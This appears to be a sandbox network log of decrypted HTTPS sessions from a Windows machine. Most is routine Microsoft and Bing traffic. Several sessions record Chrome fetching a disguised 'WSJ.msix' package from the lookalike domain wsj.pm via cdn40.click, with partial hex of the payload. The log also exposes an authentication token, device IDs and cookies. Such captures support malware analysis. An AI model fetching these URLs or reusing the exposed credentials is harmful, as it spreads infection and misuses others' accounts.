                                                                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                Server: ECAcc (chd/0790)
                                                                                                                X-CID: 11
                                                                                                                X-Ms-ApiVersion: Distribute 1.2
                                                                                                                X-Ms-Region: prod-eus-z1
                                                                                                                Cache-Control: public, max-age=144298
                                                                                                                Date: Thu, 25 Apr 2024 14:58:37 GMT
                                                                                                                Connection: close
                                                                                                                X-CID: 2


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                56 | 192.168.2.17 | 49786 | 184.31.62.93 | 443
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-04-25 14:58:38 UTC | 239 | OUT | GET /fs/windows/config.json HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Accept: */*
                                                                                                                Accept-Encoding: identity
                                                                                                                If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                Range: bytes=0-2147483646
                                                                                                                User-Agent: Microsoft BITS/7.8
                                                                                                                Host: fs.microsoft.com
                                                                                                                2024-04-25 14:58:38 UTC | 515 | IN | HTTP/1.1 200 OK
                                                                                                                ApiVersion: Distribute 1.1
                                                                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                Content-Type: application/octet-stream
                                                                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                Server: ECAcc (chd/0758)
                                                                                                                X-CID: 11
                                                                                                                X-Ms-ApiVersion: Distribute 1.2
                                                                                                                X-Ms-Region: prod-eus-z1
                                                                                                                Cache-Control: public, max-age=144297
                                                                                                                Date: Thu, 25 Apr 2024 14:58:38 GMT
                                                                                                                Content-Length: 55
                                                                                                                Connection: close
                                                                                                                X-CID: 2
                                                                                                                2024-04-25 14:58:38 UTC | 55 | IN | Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                57 | 192.168.2.17 | 49785 | 40.126.28.14 | 443
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-04-25 14:58:38 UTC | 422 | OUT | POST /RST2.srf HTTP/1.0
                                                                                                                Connection: Keep-Alive
                                                                                                                Content-Type: application/soap+xml
                                                                                                                Accept: */*
                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                Content-Length: 4788
                                                                                                                Host: login.live.com
                                                                                                                2024-04-25 14:58:38 UTC | 4788 | OUT | Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                2024-04-25 14:58:38 UTC | 569 | IN | HTTP/1.1 200 OK
                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                                Expires: Thu, 25 Apr 2024 14:57:38 GMT
                                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                x-ms-route-info: C529_SN1
                                                                                                                x-ms-request-id: 15bab184-effa-4e19-b2e8-f25e65db99af
                                                                                                                PPServer: PPV: 30 H: SN1PEPF0002F1A9 V: 0
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                Date: Thu, 25 Apr 2024 14:58:38 GMT
                                                                                                                Connection: close
                                                                                                                Content-Length: 11153
                                                                                                                2024-04-25 14:58:38 UTC | 11153 | IN | Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                58 | 192.168.2.17 | 49787 | 13.107.5.88 | 443
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-04-25 14:58:38 UTC | 537 | OUT | GET /ab HTTP/1.1
                                                                                                                Host: evoke-windowsservices-tas.msedge.net
                                                                                                                Cache-Control: no-store, no-cache
                                                                                                                X-PHOTOS-CALLERID: 9NMPJ99VJBWV
                                                                                                                X-EVOKE-RING:
                                                                                                                X-WINNEXT-RING: Public
                                                                                                                X-WINNEXT-TELEMETRYLEVEL: Basic
                                                                                                                X-WINNEXT-OSVERSION: 10.0.19045.0
                                                                                                                X-WINNEXT-APPVERSION: 1.23082.131.0
                                                                                                                X-WINNEXT-PLATFORM: Desktop
                                                                                                                X-WINNEXT-CANTAILOR: False
                                                                                                                X-MSEDGE-CLIENTID: {c1afbad7-f7da-40f2-92f9-8846a91d69bd}
                                                                                                                X-WINNEXT-PUBDEVICEID: dbfen2nYS7HW6ON4OdOknKxxv2CCI5LJBTojzDztjwI=
                                                                                                                If-None-Match: 2056388360_-1434155563
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                2024-04-25 14:58:38 UTC | 438 | IN | HTTP/1.1 200 OK
                                                                                                                Content-Length: 7285
                                                                                                                Content-Type: application/json; charset=utf-8
                                                                                                                ETag: -768392042_-1138153652
                                                                                                                Strict-Transport-Security: max-age=2592000
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                X-ExP-TrackingId: ef9e521c-d44f-4384-a3b2-70b92b7451ad
                                                                                                                X-Cache: CONFIG_NOCACHE
                                                                                                                X-MSEdge-Ref: Ref A: A5BA5D05350C4B159ACDFEFAC2000E91 Ref B: ATL331000105035 Ref C: 2024-04-25T14:58:38Z
                                                                                                                Date: Thu, 25 Apr 2024 14:58:38 GMT
                                                                                                                Connection: close


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                59 | 192.168.2.17 | 49788 | 13.107.21.200 | 443
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-04-25 14:58:39 UTC | 2564 | OUT | GET /client/config?cc=CH&setlang=en-CH HTTP/1.1
                                                                                                                X-Search-CortanaAvailableCapabilities: None
                                                                                                                X-Search-SafeSearch: Moderate
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
                                                                                                                X-UserAgeClass: Unknown
                                                                                                                X-BM-Market: CH
                                                                                                                X-BM-DateFormat: dd/MM/yyyy
                                                                                                                X-Device-OSSKU: 48
                                                                                                                X-BM-DTZ: 120
                                                                                                                X-DeviceID: 01000A41090080B6
                                                                                                                X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E
                                                                                                                X-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard Time
                                                                                                                X-BM-Theme: 000000;0078d7
                                                                                                                X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAfzLBKdQCm28CuuxSNuYztu7EsL7kM769LErRWmNGF0YaycAS/EF10D5AFL6ce5V6NubDyyAlEankxphWwbF3Zkcodae1JTiS82W5IqxsAZeIGIp7QaY6JTHKtRqt6KEyC7zcbmSdNqvjmfJnoE%2BYuJIWIOMvj9e61j67iSOsaW5yPtDm6A2Ko8k4kHvl9/y4OUYw7tos%2BqX7a4ajNojcn/%2BDbwK3H1IdFpEKv1oyFblwSLD/wqQ%2BOO4/XbmYMWd13OqRnoWy5/spJAcJnE8ZC9LKpqS2jPGInoQC6TbPU/y5J%2BxITZtEzQSCHjr16fdOhoPhBPAuaWyDmETEVNgdiwDZgAACKN/6GJ5hpirqAEcFppM/deTNK56h1fTsecQj6efW5sXGKIkb3Vb8yln%2BfGBzzH0wpS8cDLWTHoIgQzzC8PG/u1cCyFQ4nVgzCHM/ePS3Oe6yjui0nWDzNf2nMzcumEakiioNdNK/kN%2B1GY321OPE3p/BvtKwSMdr1%2Bc2IySS9Vc5o2PMLFR0q9euc9w%2BfJliN1EmcTHg9RYAomP3lXn763OoOEhblBx/VJrrUuwAaONp6Htg2s9szOieqv9dfGEkmwIUPkreePKED3QSTHdizIvkyD2ArEj181uEfEKFN0m7phP9ItbB05/LfQ82qVa7S6QucixnvjrolClT5Lwdc9T1w9T2XaIOYyzpmi%2BzcvTSudcp03zV9iyFr63AAle78T86hWtHziucLicgJTKDs/b8TV2EpUjPEIBRV2u81H4fMkbTaoOHVey9jj6iYx%2B/pAGeatoNz1Bsbn1XMcY5R9nv379Aax/6bj%2Brwhs6trImm9Q3jabPfKdI0HDeiZI747w1MqX/lOOi61lecoVwppq42ulTvxSMkQNCgWZN5djPBDl1ScMHpQTrnIAlpjTeycr2gE%3D%26p%3D
                                                                                                                X-Agent-DeviceId: 01000A41090080B6
                                                                                                                X-BM-CBT: 1714057116
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                X-Device-isOptin: false
                                                                                                                Accept-language: en-GB, en, en-US
                                                                                                                X-Device-Touch: false
                                                                                                                X-Device-ClientSession: 75625C546F974997B6B8D64F1964277D
                                                                                                                X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                                                                Host: www.bing.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: SRCHUID=V=2&GUID=C4EAB6C130004333A34B5668AE4E4D10&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20240207; SRCHHPGUSR=SRCHLANG=en; MUID=4590362BB5CF472B95BBEDB3112D4B7B; MUIDB=4590362BB5CF472B95BBEDB3112D4B7B
                                                                                                                2024-04-25 14:58:40 UTC | 1463 | IN | HTTP/1.1 200 OK
                                                                                                                Cache-Control: private
                                                                                                                Content-Length: 2215
                                                                                                                Content-Type: application/json; charset=utf-8
                                                                                                                P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
                                                                                                                Set-Cookie: _EDGE_S=SID=1A4025EFE34D68930DD73183E25A6973&mkt=de-ch; domain=.bing.com; path=/; HttpOnly
                                                                                                                Set-Cookie: MUIDB=4590362BB5CF472B95BBEDB3112D4B7B; expires=Tue, 20-May-2025 14:58:40 GMT; path=/; HttpOnly
                                                                                                                Set-Cookie: ANON=A=84BEA1DAAAB85FA790252CDAFFFFFFFF; domain=.bing.com; expires=Tue, 20-May-2025 14:58:40 GMT; path=/; secure; SameSite=None
                                                                                                                Set-Cookie: WLS=C=0000000000000000&N=; domain=.bing.com; path=/; secure; SameSite=None
                                                                                                                Set-Cookie: _SS=SID=1A4025EFE34D68930DD73183E25A6973; domain=.bing.com; path=/; secure; SameSite=None
                                                                                                                X-EventID: 662a6fa09caf4750a483b7072ccbce20
                                                                                                                UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Cache: CONFIG_NOCACHE
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                X-MSEdge-Ref: Ref A: 0FC90705D4B6498589229EA438A09BFA Ref B: ATL331000104051 Ref C: 2024-04-25T14:58:39Z
                                                                                                                Date: Thu, 25 Apr 2024 14:58:40 GMT
                                                                                                                Connection: close


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                60 | 192.168.2.17 | 49789 | 103.113.70.37 | 443 | 6544 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-04-25 14:58:53 UTC | 694 | OUT | GET /download.php HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                Sec-Fetch-User: ?1
                                                                                                                Sec-Fetch-Dest: document
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:54 UTC | 215 | IN | HTTP/1.1 302 Found
                                                                                                                Date: Thu, 25 Apr 2024 14:58:53 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Location: https://cdn40.click/files/WSJ.msix
                                                                                                                Content-Length: 0
                                                                                                                Connection: close
                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                61 | 192.168.2.17 | 49791 | 23.133.88.190 | 443 | 6544 | C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-04-25 14:58:54 UTC | 700 | OUT | GET /files/WSJ.msix HTTP/1.1
                                                                                                                Host: cdn40.click
                                                                                                                Connection: keep-alive
                                                                                                                Upgrade-Insecure-Requests: 1
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                Sec-Fetch-Mode: navigate
                                                                                                                Sec-Fetch-User: ?1
                                                                                                                Sec-Fetch-Dest: document
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:55 UTC | 255 | IN | HTTP/1.1 200 OK
                                                                                                                Server: nginx/1.18.0
                                                                                                                Date: Thu, 25 Apr 2024 14:58:54 GMT
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Length: 1064965
                                                                                                                Last-Modified: Wed, 24 Apr 2024 11:49:01 GMT
                                                                                                                Connection: close
                                                                                                                ETag: "6628f1ad-104005"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Data Ascii: S_]:~,f|7@Bp(nHaVloMBy"{j..;~u6Dn'^a'woW!1 Lb*tq hq"].cj`oRhTct"sVY<|Fu=&@WT'iz<=Wa%n
                                                                                                                2024-04-25 14:58:55 UTC16384INData Raw: 33 02 f1 a3 e8 fd 23 f4 f9 9d 15 ff 17 fa fc cb b9 e3 fb fc 92 fc ff 33 7d fe b9 b3 8e e9 f3 d5 4f ff 4f f4 f9 1f 3e 91 ea f3 0b fe df d1 f9 bd 67 8e ef f3 2f f2 19 92 a2 f3 f6 14 9d e7 27 e8 fc 9a 14 9d c3 8b 44 bf be d6 be 11 52 27 16 e5 9a cb ec da 14 a9 9f 0b a9 2f 80 d4 c5 5f 31 92 61 97 a4 88 7a 96 24 5c bd e6 88 7d 7e 92 e0 cf 4d dd c3 57 32 7c 44 dd 05 00 56 c2 5c f8 ab 8f 21 7b 9b 76 8e 23 fb f7 7e 90 1a 02 99 5a 1a f5 f3 f0 67 0e f5 57 e4 ba 07 2a d4 34 92 98 c8 ad af cd 4b f6 b2 fd 37 cc c7 22 2b 2f 30 da b2 5d ab e7 31 0d 98 6d b9 b2 0b 84 70 80 80 a0 66 c4 ab 60 31 d1 b2 e4 8a 75 d7 5d 9e ee 09 c6 a1 23 fa 69 fd d5 94 5b ad 66 cf 46 7b 2a b6 03 e7 9c a2 b6 0b 53 b5 09 f6 b8 f1 9c 97 49 d0 a5 4f 78 56 d0 33 fa cc f5 2e 2e 77 5b e3 d3 19 f8 44
                                                                                                                Data Ascii: 3#3}OO>g/'DR'/_1az$\}~MW2|DV\!{v#~ZgW*4K7"+/0]1mpf`1u]#i[fF{*SIOxV3..w[D
                                                                                                                2024-04-25 14:58:55 UTC16384INData Raw: d8 cf 35 e4 6a 17 0d c5 0d 9f cf 9b b5 8b 16 65 ba 76 d1 0a 61 ff 5b 50 3d 26 ec 17 01 06 e0 46 a7 68 a7 ff 0e 0d b1 cd aa 8b c2 b0 c1 a6 d2 00 33 e2 13 07 a6 19 12 31 d3 21 6a 31 62 d3 b1 5c 4e 0b a0 1f 18 3c a6 b4 fb 9d d8 80 fd 31 6c a5 a3 2b 94 9a 1e 5a 56 c4 6c 4d c2 d2 9b 81 e5 9f 93 26 2b 3d 9c 01 81 83 dd f9 1f a7 e1 89 2e c7 06 b0 5c bb 01 18 07 b5 db 96 ea 61 12 47 ea dc 60 4e be 55 bd a6 42 41 8f 19 aa ab 98 b3 62 c1 81 d4 ad f7 20 2b 8b 10 10 dd d2 7d 33 5e 78 79 06 12 31 10 0d 35 3d 52 90 ae 47 e6 22 2d f2 c2 4c 60 10 29 c8 d0 7f 3c 87 b2 46 b2 28 32 62 c7 6f 80 cf bb 08 fa 0e bb 8f 46 be 89 e5 26 6d f1 04 3d fb e0 88 73 e1 88 a1 bf 9b 8e 1c 35 86 86 9e de 58 c9 0e b1 a6 20 73 05 3d 13 48 96 1d 25 59 e6 43 de a2 98 2c 6b 84 2c 3b aa 7e 0c 59
                                                                                                                Data Ascii: 5jeva[P=&Fh31!j1b\N<1l+ZVlM&+=.\aG`NUBAb +}3^xy15=RG"-L`)<F(2boF&m=s5X s=H%YC,k,;~Y
                                                                                                                2024-04-25 14:58:55 UTC16384INData Raw: e4 3c 80 2d 87 2d a7 62 02 af d7 55 30 77 fb 06 32 c8 d5 43 da 66 d6 b3 f8 31 62 46 7b a0 ae 45 72 ca 18 ce cc 01 02 6b 2d 03 6a 0c f5 e7 f2 34 df 04 03 df f2 6e c0 37 0b 3c ff 88 04 e0 c1 0a 70 e0 fc 30 62 a4 88 ff 8a 07 ea f4 ef f5 54 d2 6a 3f 0e 01 a0 1c 14 83 8a ed 87 87 1d e6 5d 24 cf 66 46 ae 65 71 c3 e1 f4 0b 24 c4 de 6e b5 1f bd 2c e3 7b 89 8c 50 d8 b2 e4 17 87 d3 cf 48 c6 ff 34 0e ca 66 77 ef 4e 8d ff 54 76 a7 5e 5e e7 ff 66 77 92 9b 2e e5 45 ac 7e ca ca 5a 5b c4 f0 27 f7 70 ba e3 bf a6 88 ed cd dc 2e e4 97 3e 58 65 e9 92 fd a7 b2 32 c9 20 96 30 72 65 a6 a0 91 01 26 f1 32 54 3d 40 41 7f ee 58 d5 d2 4e 1f 76 c4 f3 67 66 fa dd 2a d6 b5 bf 45 3f d0 2c 7b 57 f6 ef bb 5a 5b e0 57 65 01 1a 15 d5 58 d2 a5 d2 49 30 a3 2b 78 90 14 19 c4 d1 66 1e f2 a7 25
                                                                                                                Data Ascii: <--bU0w2Cf1bF{Erk-j4n7<p0bTj?]$fFeq$n,{PH4fwNTv^^fw.E~Z['p.>Xe2 0re&2T=@AXNvgf*E?,{WZ[WeXI0+xf%
                                                                                                                2024-04-25 14:58:55 UTC16384INData Raw: 6c 96 01 48 e1 4f f2 31 4d a9 c6 5e 60 b9 45 2b 96 2f 39 75 cc 8b e3 61 44 8c cc f6 88 65 3d 19 51 c1 db 16 f0 8d 86 46 59 02 af 97 18 5a 5b f5 bd 2c 3f d8 5a 45 85 0d 8b 8a ef 14 28 43 1e 2d 79 26 92 d3 4e 81 b2 2f 61 22 4c ed 68 e5 70 93 52 62 d4 37 1b 95 b7 4d 31 f0 47 b3 51 df 14 6b 52 de 06 35 c5 5a ee c1 9a 86 be 96 2d 0e ad 96 5e ad ad 36 43 95 0d ee a9 ae ae 66 f5 67 d8 d2 5a 66 47 70 a9 6f 90 a1 b1 86 46 dd 1b de 49 91 5c d0 09 a3 b2 29 3e 21 91 74 a5 be 45 59 e4 af 1a 5e 2f 83 19 fc 32 1f 98 01 63 8c fa 9d c6 65 c7 8d 0b 8e 88 8e 33 c6 ec e3 23 5d 7c 8c ca ed bc d2 db ed a4 51 b9 d7 d6 af 0a 1e 2b 7a ca 9b 33 2a b7 ea 3d f9 cf 2c 47 9b d1 3f 11 5e 68 32 df ca 47 49 82 cc 7b 8c 31 5b f6 ec e1 95 3b f9 1a e3 82 8b 21 ca bd 52 43 77 37 d4 b7 76 5f
                                                                                                                Data Ascii: lHO1M^`E+/9uaDe=QFYZ[,?ZE(C-y&N/a"LhpRb7M1GQkR5Z-^6CfgZfGpoFI\)>!tEY^/2ce3#]|Q+z3*=,G?^h2GI{1[;!RCw7v_
                                                                                                                2024-04-25 14:58:55 UTC16384INData Raw: 12 2a 36 ef 5e f8 f0 c4 f0 21 ee bc f7 f7 9f b6 f6 6d b1 75 93 16 a6 ac fa e3 b1 2f d4 79 b1 df 1e 5e 49 87 21 c9 fb 56 0d ea e1 72 de fc 6d b7 9a 10 ed 03 57 a6 8d 7b fd ad ef 76 7c 94 fc dd d5 94 87 8e b8 8f da fa ea 17 b9 c9 2f 8d bc 7e ec b0 be a7 f7 b0 b1 83 87 26 65 f4 2d 7b 33 e4 bc 51 bb f6 66 d2 37 97 4e 9f 0c f8 26 dd e3 f1 8d 65 7e 3f 7b bc a0 6e c8 9e 39 30 e7 8a e9 05 fd 33 ba e5 8f bd 92 7d e2 91 43 5b 1e 3b 11 ee 5f b5 b9 f0 03 bf af 7b 53 27 a5 86 95 bf 52 f2 c5 df c7 46 5c 1e f4 63 d1 9b e3 a6 dc 59 3d a5 70 e6 33 11 ef fe 58 38 eb 87 3f 86 bf 92 fb 65 dd 8d b3 a7 bb 5d da 65 fa 24 93 4b bd fe af ab 73 de ce 96 ec 7e e3 35 e5 73 ba aa f9 9b 5b 12 4f ea aa 2f 56 94 85 67 a7 5c 4e ac 5e 72 e0 51 6b 6b df cc e4 b8 e3 83 ae 7c fc e2 81 1d 73
                                                                                                                Data Ascii: *6^!mu/y^I!VrmW{v|/~&e-{3Qf7N&e~?{n903}C[;_{S'RF\cY=p3X8?e]e$Ks~5s[O/Vg\N^rQkk|s


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
62 | 192.168.2.17 | 49792 | 20.114.59.183 | 443
Timestamp | Bytes transferred | Direction | Data
2024-04-25 14:59:05 UTC | 306 | OUT | GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=DxOPtc+GXgku2Br&MD=fPkl8aYr HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                Accept: */*
                                                                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                Host: slscr.update.microsoft.com
2024-04-25 14:59:06 UTC | 560 | IN | HTTP/1.1 200 OK
                                                                                                                Cache-Control: no-cache
                                                                                                                Pragma: no-cache
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Expires: -1
                                                                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"
                                                                                                                MS-CorrelationId: 51cc4dd7-6fad-4d0d-a34e-0818a02e123d
                                                                                                                MS-RequestId: 22166074-40f3-4fb5-8de0-9c5450d6f55d
                                                                                                                MS-CV: vhzAqRXc0EuwsOTB.0
                                                                                                                X-Microsoft-SLSClientCache: 2160
                                                                                                                Content-Disposition: attachment; filename=environment.cab
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Date: Thu, 25 Apr 2024 14:59:05 GMT
                                                                                                                Connection: close
                                                                                                                Content-Length: 25457


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.2.17 | 49790 | 103.113.70.37 | 443 | 6544 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-25 14:59:11 UTC | 694 | OUT | GET /download.php HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Upgrade-Insecure-Requests: 1
